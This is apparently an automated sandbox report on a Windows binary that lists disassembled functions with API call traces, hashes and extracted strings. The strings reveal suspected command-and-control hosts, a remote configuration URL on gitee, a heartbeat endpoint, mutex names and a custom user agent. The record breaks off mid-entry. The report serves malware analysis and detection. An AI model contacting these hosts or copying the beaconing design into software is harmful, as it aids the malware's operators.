                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandle_memmove$ErrorLastOpen_sprintf$CacheDeleteEntryFileOptionRead_free_malloc
                                                      • String ID: err:%d$string too long
                                                      • API String ID: 642120794-359996798
                                                      • Opcode ID: 230a4bdf5c9208eb397ffb3ac3648132603d5f267f577f08ae302a3db7a50645
                                                      • Instruction ID: c9902eeee73dfb2a9aea22659707d2f3242f34e170a4351108a671e78f6adc02
                                                      • Opcode Fuzzy Hash: 230a4bdf5c9208eb397ffb3ac3648132603d5f267f577f08ae302a3db7a50645
                                                      • Instruction Fuzzy Hash: 34C19071D01649EFEB16CFA4DC84BDEBBB9FF08301F20812AE412AB281D7716945CB91
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10002B19
                                                      • DeleteUrlCacheEntryA.WININET(?,00000001,00000000), ref: 10002B51
                                                      • InternetOpenA.WININET(1005ADE8,00000000,00000000,00000000,00000000), ref: 10002B62
                                                      • GetLastError.KERNEL32(?,00000001,00000000), ref: 10002B71
                                                      • _sprintf.LIBCMT ref: 10002B94
                                                      • InternetCloseHandle.WININET(00000000), ref: 10002BB4
                                                      • InternetSetOptionA.WININET(00000000,00000006,000007D0,00000004), ref: 10002BC8
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10002BE2
                                                      • GetLastError.KERNEL32(?,00000000,00000000,80000000,00000000,?,00000001,00000000), ref: 10002BEF
                                                      • _sprintf.LIBCMT ref: 10002C12
                                                      • InternetCloseHandle.WININET(00000010), ref: 10002C39
                                                      • _malloc.LIBCMT ref: 10002C48
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • InternetReadFile.WININET(?,00000000,00000004,00000000), ref: 10002C6A
                                                      • _free.LIBCMT ref: 10002CCC
                                                      • InternetCloseHandle.WININET(00000010), ref: 10002CDC
                                                      • InternetCloseHandle.WININET(?), ref: 10002CE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandle$ErrorLastOpen_sprintf$AllocateCacheDeleteEntryFileH_prologHeapOptionRead_free_malloc
                                                      • String ID: err:%d$w/master/raidjsonapi.cpp
                                                      • API String ID: 1818718819-3113852033
                                                      • Opcode ID: 9f84d3543bb3c49a6a5b715114175bd1e5ca8334e16b1c2dd3a5e4a8baff636a
                                                      • Instruction ID: 50a741a943d7cd08b720c4cc8e4f8951a50192857fbd78911610896b0dbd9278
                                                      • Opcode Fuzzy Hash: 9f84d3543bb3c49a6a5b715114175bd1e5ca8334e16b1c2dd3a5e4a8baff636a
                                                      • Instruction Fuzzy Hash: 93515D71C00219AFEB11DBA4CC45BEEBBBCEF48350F204429F905E7256DB746A08CBA1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100154FA
                                                        • Part of subcall function 1001C213: __EH_prolog.LIBCMT ref: 1001C218
                                                        • Part of subcall function 1001C213: GetComputerNameA.KERNEL32(?,?), ref: 1001C273
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _sprintf.LIBCMT ref: 10015565
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 100155D4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 100155DE
                                                      • OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015605
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015609
                                                      • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015634
                                                      • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015649
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015650
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?), ref: 10015665
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 10015673
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?), ref: 1001567B
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 10015683
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mutex$ErrorH_prologLast$CloseCreateHandleOpenRelease$ComputerName_sprintf
                                                      • String ID: %s%s%saz$%^$%@#sdfs_12$13a.dh7483y.com$sadfasdf
                                                      • API String ID: 2639461599-2215545067
                                                      • Opcode ID: 1518ece147888d06eb28e1bab33ca1dda2ae3e3787e08298007f95db480e2bae
                                                      • Instruction ID: e3f48761596626cd4d4354f5a4ff52278281e6d761e45354df657ce548eb757b
                                                      • Opcode Fuzzy Hash: 1518ece147888d06eb28e1bab33ca1dda2ae3e3787e08298007f95db480e2bae
                                                      • Instruction Fuzzy Hash: 575160B1900218EFEB11DFA4CC959EDBBBCEF08350F54042AE505A7152D771AA45CFA5
                                                      APIs
                                                      • __time64.LIBCMT ref: 1001DBE3
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 1001DBF0
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001DC0E
                                                      • WSAGetLastError.WS2_32 ref: 1001DC1F
                                                      • htons.WS2_32(?), ref: 1001DC3F
                                                      • inet_addr.WS2_32(00000000), ref: 1001DC5F
                                                      • setsockopt.WS2_32 ref: 1001DC92
                                                      • setsockopt.WS2_32(0000FFFF,0000FFFF,00001006,?,00000004), ref: 1001DCA9
                                                      • Sleep.KERNEL32(00000000,hreq,00000000,?,hres,00000000), ref: 1001DD41
                                                      • sendto.WS2_32(?,?,?,00000000,?,?), ref: 1001DD8B
                                                      • WSAGetLastError.WS2_32 ref: 1001DD96
                                                      • recvfrom.WS2_32(?,?,00000400,00000000,?,?), ref: 1001DDBF
                                                      • inet_ntoa.WS2_32(?), ref: 1001DDCE
                                                      • _memcmp.LIBCMT ref: 1001DE4E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastTimesetsockopt$FileSleepSystem__aulldiv__time64_memcmp_randhtonsinet_addrinet_ntoarecvfromsendtosocket
                                                      • String ID: ccht$hreq$hres
                                                      • API String ID: 77764386-3895697549
                                                      • Opcode ID: 60279af41891f6b088b8d9653c596f09ee8966f245381f0cf8b45bc7c9cf3f26
                                                      • Instruction ID: 5b83e77b3cde625a7e5fbc45e1b969dd0d46cb07dd602809bcd323590f17d49f
                                                      • Opcode Fuzzy Hash: 60279af41891f6b088b8d9653c596f09ee8966f245381f0cf8b45bc7c9cf3f26
                                                      • Instruction Fuzzy Hash: B191C071508341AFE310FB60DC85BAAB7E8EF54351F40492AF585CB1E1EB71E989CB92
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000DB63
                                                      • gethostbyname.WS2_32(wktcp.61611.live), ref: 1000DB78
                                                      • inet_addr.WS2_32(127.0.0.1), ref: 1000DBA7
                                                      • inet_addr.WS2_32(127.0.0.0), ref: 1000DBB2
                                                      • inet_addr.WS2_32(0.0.0.0), ref: 1000DBBD
                                                      • inet_addr.WS2_32(114.114.114.114), ref: 1000DC08
                                                      • inet_addr.WS2_32(?), ref: 1000DC75
                                                        • Part of subcall function 1000C213: __EH_prolog.LIBCMT ref: 1000C218
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: inet_addr$H_prolog$gethostbyname
                                                      • String ID: 0.0.0.0$114.114.114.114$127.0.0.0$127.0.0.1$CName%d = %s$DNSLookup2 result (%s):$IP%d(string) = %s$wktcp.61611.live
                                                      • API String ID: 2362621887-2449872679
                                                      • Opcode ID: 82a042206518e83c2ccd3ba523b22199bff41905fed9c617c79086a254f7e434
                                                      • Instruction ID: fb56de858478cce894448d15b18088730dc155a2225b55e9ecbf044c5fcc7fa9
                                                      • Opcode Fuzzy Hash: 82a042206518e83c2ccd3ba523b22199bff41905fed9c617c79086a254f7e434
                                                      • Instruction Fuzzy Hash: CE514F75D1021AEFEB14DFA8DC91DEDBBB5FF44290F20412AE402A7255DB70AA44CFA1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100087EE
                                                      • __time64.LIBCMT ref: 10008822
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 1000882F
                                                      • __time64.LIBCMT ref: 10008838
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _sprintf.LIBCMT ref: 1000889F
                                                        • Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473
                                                      • _strstr.LIBCMT ref: 10008A15
                                                      • _memmove.LIBCMT ref: 10008A51
                                                      • Sleep.KERNEL32(00001388), ref: 10008A6E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$Time__time64$FileSleepSystem__aulldiv_memmove_rand_sprintf_strstr
                                                      • String ID: /index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld$[SERVER] GetSystemConfiG res:%s$api.5566331.com$https://gitee.com/didiaodewangzhe/jsonAPP/raw/master/raidjsonapi.cpp
                                                      • API String ID: 1127589319-1662654624
                                                      • Opcode ID: 266c2795f8b2a94bdbc6c10271b49fc0f966e2b4292bc8d780b13eb92134bc73
                                                      • Instruction ID: 24a5ebd035d5e92a78baa848362d5051307424672981ef701fa1a64b86c1e668
                                                      • Opcode Fuzzy Hash: 266c2795f8b2a94bdbc6c10271b49fc0f966e2b4292bc8d780b13eb92134bc73
                                                      • Instruction Fuzzy Hash: A4815EB5D042589EEB24DFA4CC41BDEBBB8FF14340F508599E509AB246DB706B84CFA1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10002980
                                                      • _malloc.LIBCMT ref: 100029AD
                                                      • InternetOpenA.WININET(RookIE/1.0,00000000,00000000,00000000,00000000), ref: 100029D0
                                                      • InternetSetOptionA.WININET(00000000,00000006,000007D0,00000004), ref: 100029EC
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000000,00000000), ref: 10002A00
                                                      • HttpQueryInfoA.WININET(00000000,00000005,?,?,?), ref: 10002A36
                                                      • InternetReadFile.WININET(?,?,?,00000001), ref: 10002A77
                                                      • InternetCloseHandle.WININET(?), ref: 10002AD6
                                                      • InternetCloseHandle.WININET(00000000), ref: 10002AE0
                                                      • _free.LIBCMT ref: 10002AFC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandleOpen$FileH_prologHttpInfoOptionQueryRead_free_malloc
                                                      • String ID: $RookIE/1.0
                                                      • API String ID: 3800676648-2743260696
                                                      • Opcode ID: 57a82b4d4ddf381701bd030490dc1e76e59a2477cf2e1381f9ec5e6719aa71e3
                                                      • Instruction ID: 60be78cb3456d9a8e6995664e1d177457c95fe33f50e6e38e60124fae310fd8d
                                                      • Opcode Fuzzy Hash: 57a82b4d4ddf381701bd030490dc1e76e59a2477cf2e1381f9ec5e6719aa71e3
                                                      • Instruction Fuzzy Hash: 2A514871E00219AFEF11CFA4CC85BEEBBB8FB48351F204129F501F6294DB75AA058B61
                                                      APIs
                                                      • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727),00000001,00000000,00000000,00000000), ref: 1001046F
                                                      • GetLastError.KERNEL32(?,000001C8,?,10010B1D,?,?,000001C8,?), ref: 1001047B
                                                      • _wprintf.LIBCMT ref: 10010487
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000400,00000000), ref: 1001049C
                                                      • GetLastError.KERNEL32(?,000001C8,?,10010B1D,?,?,000001C8,?), ref: 100104A6
                                                      • _wprintf.LIBCMT ref: 100104B2
                                                      • InternetCloseHandle.WININET(00000000), ref: 100104BA
                                                      Strings
                                                      • InternetOpenUrl error: %d, xrefs: 100104AD
                                                      • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727), xrefs: 1001046A
                                                      • InternetOpen error: %d, xrefs: 10010482
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$ErrorLastOpen_wprintf$CloseHandle
                                                      • String ID: InternetOpen error: %d$InternetOpenUrl error: %d$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727)
                                                      • API String ID: 4184951356-3019792808
                                                      • Opcode ID: 1c53bb0bbcba253483e6f0b9edd707838fdf13d34a631c261df6a1bcb328a2f6
                                                      • Instruction ID: fdd271cfc1952d43686e52e3cb2134a55a55c06e4c3b67e23485a96a698a7243
                                                      • Opcode Fuzzy Hash: 1c53bb0bbcba253483e6f0b9edd707838fdf13d34a631c261df6a1bcb328a2f6
                                                      • Instruction Fuzzy Hash: FE018F722015347BE720A7F59C8DDAB7F1CEF426B1F118109FB0896260DA609840C6E5
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,1003666B,1005F5F8,00000008), ref: 1003C777
                                                      • _free.LIBCMT ref: 1003C790
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      • _free.LIBCMT ref: 1003C7A3
                                                      • _free.LIBCMT ref: 1003C7C1
                                                      • _free.LIBCMT ref: 1003C7D3
                                                      • _free.LIBCMT ref: 1003C7E4
                                                      • _free.LIBCMT ref: 1003C7EF
                                                      • _free.LIBCMT ref: 1003C811
                                                      • EncodePointer.KERNEL32(000000FF), ref: 1003C819
                                                      • _free.LIBCMT ref: 1003C82E
                                                      • _free.LIBCMT ref: 1003C844
                                                      • InterlockedDecrement.KERNEL32 ref: 1003C856
                                                      • _free.LIBCMT ref: 1003C870
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                                      • String ID:
                                                      • API String ID: 4264854383-0
                                                      • Opcode ID: afd15cdc7ab4b273743eefa47ed2bf7ae6b5034d1a0428082421af12fd767f58
                                                      • Instruction ID: 79696616e0b730dd919b1f1cbee781b66b56706a222b501a3b1922b7791e6efb
                                                      • Opcode Fuzzy Hash: afd15cdc7ab4b273743eefa47ed2bf7ae6b5034d1a0428082421af12fd767f58
                                                      • Instruction Fuzzy Hash: 1A217136801221DFE702DF16DCC4919B7E6FB45766F25822EE8089F261EBB56C80CF50
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10008012
                                                      • htonl.WS2_32(?), ref: 10008068
                                                      • __time64.LIBCMT ref: 100080A5
                                                      • htonl.WS2_32(00000017), ref: 1000821E
                                                      • htonl.WS2_32(?), ref: 10008224
                                                      • htonl.WS2_32(?), ref: 10008233
                                                      • htonl.WS2_32(?), ref: 1000823B
                                                      • _malloc.LIBCMT ref: 10008241
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • _memmove.LIBCMT ref: 1000826B
                                                      • _free.LIBCMT ref: 1000828D
                                                      Strings
                                                      • Send Context:%s,time:%d,rand:%d, xrefs: 10008092
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: htonl$AllocateH_prologHeap__time64_free_malloc_memmove
                                                      • String ID: Send Context:%s,time:%d,rand:%d
                                                      • API String ID: 1013815920-2080267509
                                                      • Opcode ID: 2d6e38e13791e64b350867ec93c7576bf3289652f4b36b5ef4caa61d214e1a40
                                                      • Instruction ID: 5ef619c4959f7fe7b54a5c6b697cdb2a2ac42440dc1d89eb5a562cbe716d77b1
                                                      • Opcode Fuzzy Hash: 2d6e38e13791e64b350867ec93c7576bf3289652f4b36b5ef4caa61d214e1a40
                                                      • Instruction Fuzzy Hash: 09814875D00219EFEF15DFA4C891AEEBBB9FF14350F50406AE40A67142DB30AA85CF60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 4104443479-4289949731
                                                      • Opcode ID: f038b8342a10b2506af5a521b8d4ddfff3de83e14065b04dfc025b1a13fc3b43
                                                      • Instruction ID: 78209948d3c235d0ccee1f15894afd96e8bb927bde5659be2634817a1c8f91c7
                                                      • Opcode Fuzzy Hash: f038b8342a10b2506af5a521b8d4ddfff3de83e14065b04dfc025b1a13fc3b43
                                                      • Instruction Fuzzy Hash: 59D14C71B00605EFDB26CF48D981A8FB7F9EF48681B24C929E941CB705D731EA50CBA1
                                                      APIs
                                                      • __time64.LIBCMT ref: 1000D17C
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • _rand.LIBCMT ref: 1000D189
                                                        • Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E
                                                      • _sprintf.LIBCMT ref: 1000D2B3
                                                      • Sleep.KERNEL32(000003E8), ref: 1000D415
                                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?), ref: 1000D44D
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 1000D45B
                                                      • ReleaseMutex.KERNEL32(?,?,?,?,?,?), ref: 1000D463
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 1000D46B
                                                        • Part of subcall function 1000759D: TerminateThread.KERNEL32(?,00000000), ref: 100075D1
                                                        • Part of subcall function 1000759D: CloseHandle.KERNEL32(?), ref: 100075DD
                                                      Strings
